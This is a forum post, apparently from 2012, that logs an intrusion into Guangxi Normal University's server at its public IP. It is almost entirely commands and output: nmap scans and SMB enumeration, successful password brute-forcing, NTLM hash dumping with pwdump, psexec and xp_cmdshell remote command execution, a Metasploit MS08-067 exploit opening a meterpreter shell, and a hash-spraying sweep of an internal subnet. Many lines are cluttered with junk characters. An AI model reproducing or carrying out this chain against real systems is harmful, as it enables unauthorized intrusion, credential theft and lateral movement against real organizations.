nmap + msf intrusion of Guangxi Normal University

Original poster, posted on 2012-12-4 12:46:42
Guangxi Normal University website: http://202.103.242.241/

root@bt:~# nmap -sS -sV 202.103.242.241

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 21:54 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00048s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE       VERSION
135/tcp  open  mstask        Microsoft mstask (task server - c:\winnt\system32\Mstask.exe)
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds  Microsoft Windows 2000 microsoft-ds
1025/tcp open  mstask        Microsoft mstask (task server - c:\winnt\system32\Mstask.exe)
1026/tcp open  msrpc         Microsoft Windows RPC
3372/tcp open  msdtc?
3389/tcp open  ms-term-serv?
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at http://www.insecure.org/cgi-bin/servicefp-submit.cgi :
SF-Port3372-TCP:V=5.59BETA1%I=7%D=2/28%Time=4F4CDC90%P=i686-pc-linux-gnu%r
SF:(GetRequest,6,"hO\n\x000Z")%r(RTSPRequest,6,"hO\n\x000Z")%r(HTTPOptions
SF:,6,"hO\n\x000Z")%r(Help,6,"hO\n\x000Z")%r(SSLSessionReq,6,"hO\n\x000Z")
SF:%r(FourOhFourRequest,6,"hO\n\x000Z")%r(LPDString,6,"hO\n\x000Z")%r(SIPO
SF:ptions,6,"hO\n\x000Z");
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)
Service Info: OS: Windows

Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 79.12 seconds

root@bt:/usr/local/share/nmap/scripts# ls -la | grep smb    // list the SMB scan scripts
-rw-r--r-- 1 root root 44055 2011-07-09 07:36 smb-brute.nse
-rw-r--r-- 1 root root 27691 2011-07-09 07:36 smb-check-vulns.nse
-rw-r--r-- 1 root root  4806 2011-07-09 07:36 smb-enum-domains.nse
-rw-r--r-- 1 root root  3475 2011-07-09 07:36 smb-enum-groups.nse
-rw-r--r-- 1 root root  7958 2011-07-09 07:36 smb-enum-processes.nse
-rw-r--r-- 1 root root 12221 2011-07-09 07:36 smb-enum-sessions.nse
-rw-r--r-- 1 root root  6014 2011-07-09 07:36 smb-enum-shares.nse
-rw-r--r-- 1 root root 12216 2011-07-09 07:36 smb-enum-users.nse
-rw-r--r-- 1 root root  1658 2011-07-09 07:36 smb-flood.nse
-rw-r--r-- 1 root root  2906 2011-07-09 07:36 smb-os-discovery.nse
-rw-r--r-- 1 root root 61005 2011-07-09 07:36 smb-psexec.nse
-rw-r--r-- 1 root root  4362 2011-07-09 07:36 smb-security-mode.nse
-rw-r--r-- 1 root root  2311 2011-07-09 07:36 smb-server-stats.nse
-rw-r--r-- 1 root root 13719 2011-07-09 07:36 smb-system-info.nse
-rw-r--r-- 1 root root  1429 2011-07-09 07:36 smbv2-enabled.nse

root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-enum-users.nse 202.103.242.241
// use the script to enumerate the account names present on the remote machine

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:12 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00038s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-enum-users:
|_  Domain: PG-F289F9A8EF3E; Users: Administrator, Guest, test, TsInternetUser    // scan result

Nmap done: 1 IP address (1 host up) scanned in 1.09 seconds

( o! M9 ?9 r: @5 Y, B, L* i: Mroot@bt:/usr/local/share/nmap/scripts# nmap –script=smb-enum-shares.nse 202.103.242.241 & K( U- k0 O/ c) C8 W
. P; a/ k* w: U1 J. A! O
//查看共享+ c7 Y" R4 ?  u9 l: `) a: n
# Q& W0 T' |7 E, @* e# B, Y; j0 A
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:15 CST1 p- M  f5 w* q" N: u8 g: E

# |4 u2 s" Z' ?0 Q# V9 gNmap scan report for bogon (202.103.242.241)2 f; z' f9 w0 f1 }

) }+ a7 T8 P' bHost is up (0.00035s latency).$ t6 w# f; l! Y$ H

% p7 f5 F, B  nNot shown: 993 closed ports
( |- O/ V  `7 B! j6 a/ {  q4 p: m9 O( M3 F" O+ D
PORT     STATE SERVICE
; m" h% b4 w3 O+ Y. u
( h! @+ O! j! D) @; u135/tcp  open  msrpc
4 m3 p  Y* w  X. s+ b
% r5 E! n9 h2 {& u/ D139/tcp  open  netbios-ssn
! a& G/ r% o3 O) H% U/ [' \. [( \0 m& s6 b! b
445/tcp  open  microsoft-ds2 o, Q3 A6 |" M: O, _5 G4 Q2 s
1 }  K' r6 C. |; Q( _& Q$ W$ j
1025/tcp open  NFS-or-IIS, a. r0 \% R/ t

$ Z) t: n, r; C9 o4 R" d1026/tcp open  LSA-or-nterm4 y8 O; K" _  D/ w: a2 ]  g5 o

, M! l" I( |  O3372/tcp open  msdtc5 H/ H; |0 u% L* @0 _. G6 V
4 {+ G( j6 `) s" o
3389/tcp open  ms-term-serv* P4 T3 c# n. ]" X
- k5 I& z1 K( A4 r* i7 H1 M, r
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)
. z  s  h6 z/ O. t9 ~4 e
- m3 D; Q% m2 U& w" g( @& \Host script results:
: u- L( X8 B0 L; T. j% u& q+ j6 T0 H7 ^5 E$ d) X. ?4 c8 ]# @
| smb-enum-shares:
) h' I0 P: k% z5 l5 @4 n( U3 x& x8 f% h1 D4 X6 h; B0 u
|   ADMIN$8 ^: G1 S: h2 \1 ~& u
. a$ o3 A! }* k) g, f2 w' Y; B  D
|     Anonymous access: <none>1 M8 r" z$ z1 a

5 i1 H/ E( n( x. i3 F|   C$
: s( _: g1 A7 e8 a. ?# p' _; H$ |  q$ j; J6 ^  a3 _
|     Anonymous access: <none>
- c5 t# s% n, G/ m1 i: c5 X/ y6 c$ o; ?
|   IPC$1 y; c1 t3 S2 D

: g+ [7 Y5 [* O' {0 J2 n' s|_    Anonymous access: READ% I+ a0 {+ ?1 w, i1 e+ z: w8 \" F

" O- |, Z# f# R% _% }Nmap done: 1 IP address (1 host up) scanned in 1.05 seconds
" _% L: T+ U* L+ e/ b/ x$ G# V; M( d+ u( M+ {( e' e9 f. ]$ b
root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-brute.nse 202.103.242.241
// obtain user passwords

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:17 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00041s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-brute:
|   administrator:<blank> => Login was successful
|_  test:123456 => Login was successful

Nmap done: 1 IP address (1 host up) scanned in 28.22 seconds

root@bt:~# wget http://swamp.foofus.net/fizzgig/ ... -exe-only.tar.bz2    // dump the hashes
root@bt:~# tar -jxvf pwdump6-1.7.2-exe-only.tar.bz2 -C /usr/local/share/nmap/nselib/data
root@bt:/usr/local/share/nmap/scripts# wget https://svn.nmap.org/nmap-exp/dev/nmap/scripts/smb-pwdump.nse
root@bt:~# nmap --script=smb-pwdump.nse --script-args=smbuser=test,smbpass=123456 202.103.242.241 -p 135,445,139

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:25 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.0012s latency).
PORT    STATE SERVICE
135/tcp open  msrpc
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-pwdump:
| Administrator:500 => NO PASSWORD*********************:NO PASSWORD*********************
| Guest:501 => NO PASSWORD*********************:NO PASSWORD*********************
| test:1002 => 44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4
|_TsInternetUser:1000 => A63D5FC7F284A6CC341A5A0240EF721E:262A84B3E8D4B1CC32131838448C98D2

Nmap done: 1 IP address (1 host up) scanned in 1.85 seconds

C:\Documents and Settings\Administrator\桌面>psexec.exe \\202.103.242.241 -u test -p 123456 -e cmd.exe    // get a cmd shell

PsExec v1.55 - Execute processes remotely
Copyright (C) 2001-2004 Mark Russinovich
Sysinternals - www.sysinternals.com

Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.

C:\WINNT\system32>ipconfig

Windows 2000 IP Configuration

Ethernet adapter Local Area Connection:

Connection-specific DNS Suffix  . :
IP Address. . . . . . . . . . . . : 202.103.242.241
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 202.103.1.1

C:\Documents and Settings\Administrator\桌面\osql>osql.exe -S 202.103.242.241 -U sa -P "123456" -Q "exec master..xp_cmdshell 'net user' "    // log in remotely as sa and execute a command

root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-check-vulns.nse 202.103.242.241    // check the target machine for vulnerabilities

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:41 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00046s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-check-vulns:
|_  MS08-067: VULNERABLE

Nmap done: 1 IP address (1 host up) scanned in 1.43 seconds

7 H5 M' m2 m. |# \root@bt:~# msfconsole                                             //在msf上利用ms08-067漏洞对目标机器进行溢出! @% q1 P& K# @6 j- n3 n

5 Q  V3 O% S; p. mmsf > search ms08
0 s3 J1 v$ p- O0 X( m, J" p9 `
  W4 M  s1 O) S* s' `. R2 ?8 emsf > use exploit/windows/smb/ms08_067_netapi
6 I' Q0 h+ Z+ C2 O6 s" o' N( F; j2 U6 ~
msf  exploit(ms08_067_netapi) > show options
4 x, g$ ~$ w- E* a# J7 |
3 {( a9 y$ l0 C9 y3 K: j9 Vmsf  exploit(ms08_067_netapi) > set RHOST 202.103.242.241
2 u7 |+ r# `5 N% I: ], Z3 i. f) R& S* ?5 q9 t7 c
msf  exploit(ms08_067_netapi) > show payloads. ?/ G! O1 ?! A
% h4 e8 ?7 b6 E- G# Q
msf  exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/bind_tcp7 ?$ U$ |. h' k) t
* C; s7 M1 [5 z% h1 a& U) P! o
msf  exploit(ms08_067_netapi) > exploit: c& S* \! w  N: K6 K; n1 C. Q
6 v. ~) |( u; b. d' B
meterpreter >
3 f3 Y- u8 d4 c3 I* }, K7 J+ d  y0 T
Background session 2? [y/N]  (ctrl+z)
9 n4 j+ @3 I7 ^% ]/ S
4 e% k8 s* `9 I2 u& kmsf  exploit(ms08_067_netapi) > sessions -l
9 x$ W% ]$ b  S1 K. r9 a8 a
$ M) u7 Y' c7 t5 R( Qroot@bt:/usr/local/share/nmap/scripts# vim usernames.txt* ~. b/ F  X# A* z" C8 f

5 L/ S( Q# G& N$ @4 I$ \test
5 W! b2 y+ r+ c1 ?7 x* @, h8 i( [- F) T3 \# f6 q
administrator
0 F; _0 Y/ r. G- s7 b
* V  I4 K. p4 ]+ U( J3 C! ^root@bt:/usr/local/share/nmap/scripts# vim password.txt/ O/ [) w# r. L$ b$ F
1 l4 j+ W( u+ J2 m. G3 m
44EFCE164AB921CAAAD3B435B51404EE  T5 W* _: v, G. }

2 Z; v  m+ f$ U0 g1 zroot@bt:/usr/local/share/nmap/scripts# nmap –script=smb-brute.nse –script-args=userdb=usernames.txt,passdb=password.txt 192.168.1.1-254 ) [4 i3 g: @8 W& a* Q. Y8 i
/ J. W( K/ y1 o- u
//利用用户名跟获取的hash尝试对整段内网进行登录! X7 @' B8 ?# e5 _8 A9 C( K

, \3 \6 h7 P0 Z; C! j( zNmap scan report for 192.168.1.105& Y& Y. a. q& l# c7 Z
$ _& Z: I" Z4 x  t
Host is up (0.00088s latency).
2 ~4 L, a. Q) E/ I0 p( M6 [
' B% B) _' ^1 g7 W- ~8 k* z& vNot shown: 993 closed ports0 i* {- u- F# d$ R
: w4 E7 V/ {( \# S! B
PORT     STATE SERVICE+ B! L* [! L. Y9 u
; D9 `. L# |( ~+ W+ ]
135/tcp  open  msrpc
; u7 P3 ~: ~. s5 r5 `% d. _$ J, }
4 ^' y! _( Y6 M5 Z139/tcp  open  netbios-ssn
# ]$ ?7 `/ ~8 u  {  R$ U$ H5 w" k" u6 m" o6 J
445/tcp  open  microsoft-ds
/ v1 v; a, A3 O
9 U( d( Q  Z: B+ F* S- H& Y; L- D7 s! m1 e1025/tcp open  NFS-or-IIS- q" s! F1 ?7 i% d

* G5 U& B" t: C( B+ z% S. C7 X% `* M1026/tcp open  LSA-or-nterm: ^& Y& o/ t  `! @  S- F% j

* W: b* J  x" ?$ v3372/tcp open  msdtc4 X8 G0 M1 ]$ A4 \. w

' s3 L* |; ~5 |3389/tcp open  ms-term-serv2 T: }+ R  m0 j! [+ a+ g1 n9 k2 I

5 j, [8 {$ C5 uMAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)# H/ O* O4 n+ ?1 t1 \) A6 s" T

, r2 K+ T  z6 Y: W" Q0 H- R: iHost script results:* s8 U% h# o4 a/ ~
& F4 D/ P. L4 A+ Z/ Z. Q0 @
| smb-brute:7 M4 B) D* m+ O2 P8 c% a* R2 y/ W

9 \4 e) s& o/ R" ?' f|_  administrator:<blank> => Login was successful
; H! k1 ]  J  t; [: J
3 u1 d& {3 @5 Y7 ~6 h, l攻击成功,一个简单的msf+nmap攻击~~·
. X6 S' M$ E: c
" z! c5 X& V& ]4 d  {3 [